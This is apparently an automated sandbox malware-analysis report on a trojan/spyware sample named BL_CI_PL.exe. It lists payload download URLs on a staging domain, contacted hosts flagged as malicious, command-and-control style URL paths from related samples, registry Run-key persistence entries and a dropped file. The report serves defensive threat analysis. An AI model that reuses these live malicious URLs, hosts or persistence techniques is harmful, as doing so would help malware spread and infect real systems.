                                                                                                                https://word.office.comexplorer.exe, 0000000D.00000000.25986092319.000000000D715000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26102364486.000000000D715000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25887866745.000000000D715000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filminexplorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://bgreenidaho.com/UBL_CI_PL.exe, 0000000A.00000003.26182943028.000000000087A000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26188433909.000000000087B000.00000004.00000001.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://aka.ms/odirmCHITECTexplorer.exe, 0000000D.00000000.25923523579.0000000009CA3000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25879506622.0000000009CA3000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26091037711.0000000009CA3000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/explorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://zz.bdstatic.com/linksubmit/push.jsfirefox.exe, 00000018.00000000.28530738113.00000000224A2000.00000004.00020000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://powerpoint.office.comexplorer.exe, 0000000D.00000000.25986092319.000000000D715000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26102364486.000000000D715000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25887866745.000000000D715000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.foreca.comexplorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://outlook.comexplorer.exe, 0000000D.00000000.25986092319.000000000D715000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26102364486.000000000D715000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25887866745.000000000D715000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&oexplorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://www.msn.com/?ocid=iehpexplorer.exe, 0000000D.00000000.26101409229.000000000D658000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25887040916.000000000D658000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25932474197.000000000D658000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25946934247.0000000011792000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25898877530.0000000011792000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25985258552.000000000D658000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://bgreenidaho.com/Newfile/bin_UFDek247.binnk4n8p7lb.exe, 0000001B.00000003.29347013124.000000000075E000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000003.29347971433.000000000075E000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29453877035.0000000000750000.00000004.00000020.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    https://api.msn.com/v1/news/Feed/Windows?9zexplorer.exe, 0000000D.00000000.26092066193.0000000009D81000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25880373796.0000000009D81000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25976374515.0000000009D81000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25924643006.0000000009D81000.00000004.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://www.hostgator.com.bripconfig.exe, 0000000E.00000002.30170828015.00000000040B2000.00000004.00020000.sdmp, firefox.exe, 00000018.00000000.28530738113.00000000224A2000.00000004.00020000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      https://api.msn.com:443/v1/news/Feed/Windows?Uexplorer.exe, 0000000D.00000000.25999514527.00000000116D4000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25898197362.00000000116D4000.00000004.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://api.msn.com/explorer.exe, 0000000D.00000000.25946934247.0000000011792000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25898877530.0000000011792000.00000004.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://www.zoho.com/sites/?src=parkeddomain&dr=www.unitedmetal-saudi.comipconfig.exe, 0000000E.00000002.30170828015.00000000040B2000.00000004.00020000.sdmp, firefox.exe, 00000018.00000000.28530738113.00000000224A2000.00000004.00020000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://bgreenidaho.com/k4n8p7lb.exe, 0000001B.00000002.29453877035.0000000000750000.00000004.00000020.sdmptrue
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumbipconfig.exe, 0000000E.00000002.30170828015.00000000040B2000.00000004.00020000.sdmp, firefox.exe, 00000018.00000000.28530738113.00000000224A2000.00000004.00020000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://windows.msn.com:443/shellexplorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGaexplorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://www.msn.com:443/en-us/feedexplorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://excel.offiexplorer.exe, 0000000D.00000000.25925791152.0000000009E62000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26093468212.0000000009E62000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25881260799.0000000009E62000.00000004.00000001.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown
                                                                                                                                                    https://bgreenidaho.com/Newfile/bin_UFDek247.binuBL_CI_PL.exe, 0000000A.00000003.26182943028.000000000087A000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26188433909.000000000087B000.00000004.00000001.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown

                                                                                                                                                    Contacted IPs

                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                    Public

                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    35.244.144.199
                                                                                                                                                    		www.gdav130.xyzUnited States
                                                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                                                    88.99.22.5
                                                                                                                                                    		www.helpcloud.xyzGermany
                                                                                                                                                    		24940HETZNER-ASDEtrue
                                                                                                                                                    172.120.157.187
                                                                                                                                                    		www.stylesbykee.comUnited States
                                                                                                                                                    		18779EGIHOSTINGUStrue
                                                                                                                                                    50.62.172.157
                                                                                                                                                    		diggingquartz.comUnited States
                                                                                                                                                    		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                                                                                                    34.237.47.210
                                                                                                                                                    		previewbrizycloudnlbv2-664b147e649a860c.elb.us-east-1.amazonaws.comUnited States
                                                                                                                                                    		14618AMAZON-AESUSfalse
                                                                                                                                                    192.0.78.25
                                                                                                                                                    		divorcefearfreedom.comUnited States
                                                                                                                                                    		2635AUTOMATTICUStrue
                                                                                                                                                    199.59.242.153
                                                                                                                                                    		www.effective.storeUnited States
                                                                                                                                                    		395082BODIS-NJUStrue
                                                                                                                                                    192.0.78.24
                                                                                                                                                    		talkingpoint.toursUnited States
                                                                                                                                                    		2635AUTOMATTICUStrue
                                                                                                                                                    66.29.140.185
                                                                                                                                                    		www.lopsrental.leaseUnited States
                                                                                                                                                    		19538ADVANTAGECOMUStrue
                                                                                                                                                    185.61.153.97
                                                                                                                                                    		dif-directory.xyzUnited Kingdom
                                                                                                                                                    		22612NAMECHEAP-NETUStrue
                                                                                                                                                    216.172.172.87
                                                                                                                                                    		dietatrintadias.comUnited States
                                                                                                                                                    		46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                                                    81.2.194.128
                                                                                                                                                    		growebox.comCzech Republic
                                                                                                                                                    		24806INTERNET-CZKtis238403KtisCZtrue
                                                                                                                                                    20.124.109.2
                                                                                                                                                    		bgreenidaho.comUnited States
                                                                                                                                                    		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                                                                                                                    203.170.80.250
                                                                                                                                                    		www.mackthetruck.comAustralia
                                                                                                                                                    		38719DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUtrue
                                                                                                                                                    164.155.212.139
                                                                                                                                                    		www.ayudavida.comSouth Africa
                                                                                                                                                    		26484IKGUL-26484UStrue
                                                                                                                                                    34.102.136.180
                                                                                                                                                    		mummymotors.comUnited States
                                                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                                                    192.64.119.254
                                                                                                                                                    		www.yghdlhax.xyzUnited States
                                                                                                                                                    		22612NAMECHEAP-NETUStrue
                                                                                                                                                    38.143.25.232
                                                                                                                                                    		reliablehomesellers.comUnited States
                                                                                                                                                    		134520GIGSGIGSCLOUD-AS-APGigsGigsNetworkServicesHKtrue
                                                                                                                                                    136.143.191.204
                                                                                                                                                    		zhs.zohosites.comUnited States
                                                                                                                                                    		2639ZOHO-ASUSfalse
                                                                                                                                                    172.67.201.232
                                                                                                                                                    		www.topwowshopping.storeUnited States
                                                                                                                                                    		13335CLOUDFLARENETUStrue

                                                                                                                                                    General Information

                                                                                                                                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                    Analysis ID:530346
                                                                                                                                                    Start date:29.11.2021
                                                                                                                                                    Start time:14:02:19
                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 19m 38s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Sample file name:BL_CI_PL.exe
                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                                    Run name:Suspected Instruction Hammering
                                                                                                                                                    Number of analysed new started processes analysed:32
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:2
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • HDC enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@31/7@62/20
                                                                                                                                                    EGA Information:
                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                    HDC Information:Failed
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 80%
                                                                                                                                                    • Number of executed functions: 190
                                                                                                                                                    • Number of non-executed functions: 126
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Adjust boot time
                                                                                                                                                    • Enable AMSI
                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                    Warnings:
                                                                                                                                                    Show All
                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, consent.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 20.54.122.82
                                                                                                                                                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, wdcpalt.microsoft.com, client.wns.windows.com, img-prod-cms-rt-microsoft-com.akamaized.net, wdcp.microsoft.com, arc.msn.com, nexusrules.officeapps.live.com, wd-prod-cp.trafficmanager.net
                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

                                                                                                                                                    TimeTypeDescription
                                                                                                                                                    14:09:48AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run 3F1XN2EXMJF C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
                                                                                                                                                    14:11:26AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run FBF8U8LXCN C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
                                                                                                                                                    14:11:34AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run FBF8U8LXCN C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    88.99.22.5Zr26f1rL6r.exeGet hashmaliciousBrowse
                                                                                                                                                    • www.helpcloud.xyz/n8ds/?6ldD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl&5jp=eZ4Pez
                                                                                                                                                    stage4.exeGet hashmaliciousBrowse
                                                                                                                                                    • www.feetlover.online/n8rn/?DFNPQJ=SJFr9BhJeZZyi2ucxvCICI6bRNARjPLC+tg5AUSRokV2wV+CF1rvnKzW+V2D6Rw83fT/&Mf3=f880irxXZ4UDtxoP
                                                                                                                                                    AWB_SHIPPING DOCS.exeGet hashmaliciousBrowse
                                                                                                                                                    • www.helpcloud.xyz/n8ds/?v4VDH=WHU8k4m&9rJT=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl
                                                                                                                                                    172.120.157.187Zr26f1rL6r.exeGet hashmaliciousBrowse
                                                                                                                                                    • www.stylesbykee.com/n8ds/?6ldD=QiVr4NomMTfDVQzLAZiPy17hhsXauZOjQhEkIhfcDYRSe01pzyB5iClqESLJZee3iuRd&v6Mt=3fxxA4Z
                                                                                                                                                    50.62.172.157http___103.170.255.140_pdfword_invc_000930003999000.wbkGet hashmaliciousBrowse
                                                                                                                                                    • www.physicalliteracy.info/ns87/?3fND-tf=H6IkrNS3gIMcO6khEyx9JWWtD8yQzQ/wOLaqr0fRaSdXewAcgg5PO/fde8FvG7FO+YK4Pg==&d0GXaN=kPJtZt5x4
                                                                                                                                                    AWB_SHIPPING DOCS.exeGet hashmaliciousBrowse
                                                                                                                                                    • www.diggingquartz.com/n8ds/?9rJT=JCnWpsMsE1LhJoPwCBaMQ23aQlJM1lBrGqYKhWEiZBh+41Ky2Bnma6QhJDV2RS4wXNsD&at=WtR4GZm
                                                                                                                                                    Port_UETQYDYA_99381,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                    • www.wilyardmarketing.com/dgt9/?mPh=7nZlUrp&6ld=c8o76+1/OpeLiTtqzSJYdJJyGY3/veD8mfAw8Y7UQnnqn9lvqm5M1GszP0sq1xVB9h46
                                                                                                                                                    Unpaid invoice.exeGet hashmaliciousBrowse
                                                                                                                                                    • www.miaintervista.com/b2c0/?0R=MjlpdTAHd6M&z81xZ4=U8O6kRJC3F21BkR2h3rSiV6YS3+F71/8oyuisNtkXvPFAx4eznfR650M8MOCU9T/6Rg8
                                                                                                                                                    FzvFtf2XXK.exeGet hashmaliciousBrowse
                                                                                                                                                    • www.miaintervista.com/b2c0/?7nwTnlOP=U8O6kRJHqCywD0QM9nrSiV6YS3+F71/8oyuisNtkXvPFAx4eznfR650M8POdX53E6SF4&ER-=zPspTrDhV2tTc
                                                                                                                                                    pKD3j672HL.exeGet hashmaliciousBrowse
                                                                                                                                                    • www.miaintervista.com/b2c0/?o48x=U8O6kRJC3F21BkR2h3rSiV6YS3+F71/8oyuisNtkXvPFAx4eznfR650M8PuSbcDHk0J7&4hUtb=B6RDPB
                                                                                                                                                    2WK7SGkGVZ.exeGet hashmaliciousBrowse
                                                                                                                                                    • www.miaintervista.com/b2c0/?7nlpd=U8O6kRJHqCywD0QM9nrSiV6YS3+F71/8oyuisNtkXvPFAx4eznfR650M8POdX53E6SF4&_xllR=SL0l7NVxUdmdjv
                                                                                                                                                    vbc.exeGet hashmaliciousBrowse
                                                                                                                                                    • www.miaintervista.com/b2c0/?yFN4sV7X=U8O6kRJHqCywD0QM9nrSiV6YS3+F71/8oyuisNtkXvPFAx4eznfR650M8POdX53E6SF4&x0Dp=d2MlYB4
                                                                                                                                                    DOC 20191003 1756.docGet hashmaliciousBrowse
                                                                                                                                                    • citizensforacri.com/cache2fdabbafc385c5752f54f46a083809ec/i24ob20308/
                                                                                                                                                    DOC 20191003 1756.docGet hashmaliciousBrowse
                                                                                                                                                    • citizensforacri.com/cache2fdabbafc385c5752f54f46a083809ec/i24ob20308/
                                                                                                                                                    DOC 20191003 1756.docGet hashmaliciousBrowse
                                                                                                                                                    • citizensforacri.com/cache2fdabbafc385c5752f54f46a083809ec/i24ob20308/

                                                                                                                                                    Domains

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    www.lopsrental.leaseZr26f1rL6r.exeGet hashmaliciousBrowse
                                                                                                                                                    • 66.29.140.185
                                                                                                                                                    202111161629639000582.exeGet hashmaliciousBrowse
                                                                                                                                                    • 66.29.140.185
                                                                                                                                                    AWB_SHIPPING DOCS.exeGet hashmaliciousBrowse
                                                                                                                                                    • 66.29.140.185
                                                                                                                                                    PURCHASE ORDER NO.ATPL_PO_21115_05687537_2021-22.exeGet hashmaliciousBrowse
                                                                                                                                                    • 66.29.140.185
                                                                                                                                                    previewbrizycloudnlbv2-664b147e649a860c.elb.us-east-1.amazonaws.comAWB_SHIPPING DOCS.exeGet hashmaliciousBrowse
                                                                                                                                                    • 34.237.47.210
                                                                                                                                                    PO 2420208.exeGet hashmaliciousBrowse
                                                                                                                                                    • 34.237.47.210
                                                                                                                                                    https://blackberry4660212.brizy.site/Get hashmaliciousBrowse
                                                                                                                                                    • 34.237.47.210
                                                                                                                                                    https://blackberry4660212.brizy.site/Get hashmaliciousBrowse
                                                                                                                                                    • 34.237.47.210
                                                                                                                                                    www.topwowshopping.storeZr26f1rL6r.exeGet hashmaliciousBrowse
                                                                                                                                                    • 104.21.76.223
                                                                                                                                                    AWB_SHIPPING DOCS.exeGet hashmaliciousBrowse
                                                                                                                                                    • 172.67.201.232
                                                                                                                                                    www.mackthetruck.comZr26f1rL6r.exeGet hashmaliciousBrowse
                                                                                                                                                    • 203.170.80.250
                                                                                                                                                    AWB_SHIPPING DOCS.exeGet hashmaliciousBrowse
                                                                                                                                                    • 203.170.80.250

                                                                                                                                                    ASN

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    HETZNER-ASDEweb-2099508479.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 116.202.249.144
                                                                                                                                                    web-1859712127.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 116.202.249.144
                                                                                                                                                    web-1859712127.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 116.202.249.144
                                                                                                                                                    PKngA2BEjB.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 116.202.249.144
                                                                                                                                                    PKngA2BEjB.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 116.202.249.144
                                                                                                                                                    d2REPCiUoqGet hashmaliciousBrowse
                                                                                                                                                    • 5.75.234.243
                                                                                                                                                    web-1673899678.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 116.202.249.144
                                                                                                                                                    web-1673899678.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 116.202.249.144
                                                                                                                                                    web.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 116.202.249.144
                                                                                                                                                    web.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 116.202.249.144
                                                                                                                                                    web-1142655642.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 116.202.249.144
                                                                                                                                                    web-1142655642.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 116.202.249.144
                                                                                                                                                    web-115940.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 116.202.249.144
                                                                                                                                                    web-115940.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 116.202.249.144
                                                                                                                                                    Payment Advice.exeGet hashmaliciousBrowse
                                                                                                                                                    • 144.76.136.153
                                                                                                                                                    n6sOKP0EjJGet hashmaliciousBrowse
                                                                                                                                                    • 95.216.87.157
                                                                                                                                                    vwLliS25F5.exeGet hashmaliciousBrowse
                                                                                                                                                    • 5.9.162.45
                                                                                                                                                    jH9lY2utAE.exeGet hashmaliciousBrowse
                                                                                                                                                    • 116.202.14.219
                                                                                                                                                    PilHb37Gmt.exeGet hashmaliciousBrowse
                                                                                                                                                    • 5.9.162.45
                                                                                                                                                    MesxDvlCE0.exeGet hashmaliciousBrowse
                                                                                                                                                    • 5.9.162.45
                                                                                                                                                    EGIHOSTINGUSvbc.exeGet hashmaliciousBrowse
                                                                                                                                                    • 104.165.34.6
                                                                                                                                                    ROmaIReA65Get hashmaliciousBrowse
                                                                                                                                                    • 172.120.223.160
                                                                                                                                                    KvIrA10916Get hashmaliciousBrowse
                                                                                                                                                    • 142.111.73.143
                                                                                                                                                    Urgent Order#.exeGet hashmaliciousBrowse
                                                                                                                                                    • 45.39.212.183
                                                                                                                                                    uSD1d8nRJ0.exeGet hashmaliciousBrowse
                                                                                                                                                    • 142.111.110.248
                                                                                                                                                    cK1g5gckZR9VHjj.exeGet hashmaliciousBrowse
                                                                                                                                                    • 142.252.22.166
                                                                                                                                                    or4ypx7EryGet hashmaliciousBrowse
                                                                                                                                                    • 172.120.223.197
                                                                                                                                                    Zr26f1rL6r.exeGet hashmaliciousBrowse
                                                                                                                                                    • 172.120.157.187
                                                                                                                                                    SOA.exeGet hashmaliciousBrowse
                                                                                                                                                    • 45.39.212.96
                                                                                                                                                    Swift Copy TT.docGet hashmaliciousBrowse
                                                                                                                                                    • 142.111.110.248
                                                                                                                                                    Product Offerety44663573.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 68.68.98.160
                                                                                                                                                    Env#U00edo diciembre.exeGet hashmaliciousBrowse
                                                                                                                                                    • 104.253.94.109
                                                                                                                                                    IAENMAI.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 23.27.137.70
                                                                                                                                                    jydygx.arm7Get hashmaliciousBrowse
                                                                                                                                                    • 107.165.18.79
                                                                                                                                                    202111161629639000582.exeGet hashmaliciousBrowse
                                                                                                                                                    • 166.88.19.181
                                                                                                                                                    w8aattzDPjGet hashmaliciousBrowse
                                                                                                                                                    • 172.121.95.168
                                                                                                                                                    XxMcevQr2ZGet hashmaliciousBrowse
                                                                                                                                                    • 172.120.108.136
                                                                                                                                                    sora.armGet hashmaliciousBrowse
                                                                                                                                                    • 136.0.238.242
                                                                                                                                                    x3mKjigp7jGet hashmaliciousBrowse
                                                                                                                                                    • 216.172.145.226
                                                                                                                                                    588885.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 107.187.86.150

                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    37f463bf4616ecd445d4a1937da06e19web-1859712127.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 20.124.109.2
                                                                                                                                                    PKngA2BEjB.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 20.124.109.2
                                                                                                                                                    web-1673899678.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 20.124.109.2
                                                                                                                                                    61c526c5-c558-462b-b5a9-138a62b439e5.exeGet hashmaliciousBrowse
                                                                                                                                                    • 20.124.109.2
                                                                                                                                                    web.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 20.124.109.2
                                                                                                                                                    panionic.exeGet hashmaliciousBrowse
                                                                                                                                                    • 20.124.109.2
                                                                                                                                                    184285013-044310-Factura pendiente (2).exeGet hashmaliciousBrowse
                                                                                                                                                    • 20.124.109.2
                                                                                                                                                    web-1142655642.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 20.124.109.2
                                                                                                                                                    FACTURAS.exeGet hashmaliciousBrowse
                                                                                                                                                    • 20.124.109.2
                                                                                                                                                    web-115940.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 20.124.109.2
                                                                                                                                                    jH9lY2utAE.exeGet hashmaliciousBrowse
                                                                                                                                                    • 20.124.109.2
                                                                                                                                                    SecuriteInfo.com.W32.AIDetect.malware1.18149.exeGet hashmaliciousBrowse
                                                                                                                                                    • 20.124.109.2
                                                                                                                                                    date1%3fBNLv65=pAAS.dllGet hashmaliciousBrowse
                                                                                                                                                    • 20.124.109.2
                                                                                                                                                    LqESfLRNgh.exeGet hashmaliciousBrowse
                                                                                                                                                    • 20.124.109.2
                                                                                                                                                    phrkOEUqtU.exeGet hashmaliciousBrowse
                                                                                                                                                    • 20.124.109.2
                                                                                                                                                    U2fkDYwhFW.exeGet hashmaliciousBrowse
                                                                                                                                                    • 20.124.109.2
                                                                                                                                                    research-1186335980.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 20.124.109.2
                                                                                                                                                    N6y7A7R9wg.exeGet hashmaliciousBrowse
                                                                                                                                                    • 20.124.109.2
                                                                                                                                                    DClTdEZJKD.dllGet hashmaliciousBrowse
                                                                                                                                                    • 20.124.109.2
                                                                                                                                                    UD8mooZBwd.exeGet hashmaliciousBrowse
                                                                                                                                                    • 20.124.109.2

                                                                                                                                                    Dropped Files

                                                                                                                                                    No context

                                                                                                                                                    Created / dropped Files

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\DB1
                                                                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):40960
                                                                                                                                                    Entropy (8bit):0.8384034474405602
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:13WB14fxcKzsIYICVEq8MX0D0HSFlNUK6lGNxGt7KLk8s8LKvUf9KVyJ7hU:J2CdCn8MZyFlulGNxGt7KLyeymw
                                                                                                                                                    MD5:3486408AF6E5BFDBE15DEDDEFB834576
                                                                                                                                                    SHA1:8118E27D74977C176BD305862105CE5F22AE10D8
                                                                                                                                                    SHA-256:5B26EE9B1FF774148D102BD7594D4B31C4B004D05C42F72EF82B1C90362B2196
                                                                                                                                                    SHA-512:E2F45693DDBE1A42C6855439A394E1C00AE8EC81FDC4B8F1BC6EC37E93AE9389D0E0CCC3C4419572DD09371590384E859324F163BDFD462C2B1D4FF7F7ED1E73
                                                                                                                                                    Malicious:false
